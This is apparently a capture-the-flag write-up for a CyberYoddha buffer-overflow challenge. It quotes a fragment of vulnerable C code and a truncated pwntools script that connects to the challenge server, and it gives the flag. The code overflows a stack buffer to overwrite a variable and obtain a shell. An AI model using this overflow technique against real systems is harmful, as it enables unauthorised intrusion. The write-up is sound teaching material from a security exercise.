looks like buffer overflows aren’t so easy anymore.
nc cyberyoddha.baycyber.net 10003
- Haskell#1426
... hmm ... this challenge actually wasn't all that different from the previous one. This time, instead of overflowing into the return pointer, simply change the value of the long int
by overflowing ...
As you can see in the source code, if you manage to change vuln
's value to 0xd3adb33f
, you will be presented with a shell:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(void) {
long vuln = 0;
char buf[16];
if (vuln == 0xd3adb33f){
... using radare, you can easily figure out vuln
's address in memory and the offset from the beginning of the input buffer to this long
... now... simply write an exploit script, similiar to the previous one:
import struct
from pwn import *
r = remote('cyberyoddha.baycyber.net', 10003)
o = 0x10
... and cat the flag: CYCTF{wh0@_y0u_jump3d_t0_th3_funct!0n}
Btw. is it just me... or do the flags for this and the previous challenge like they were swapped... @CyberYoddha, what happened there? ^^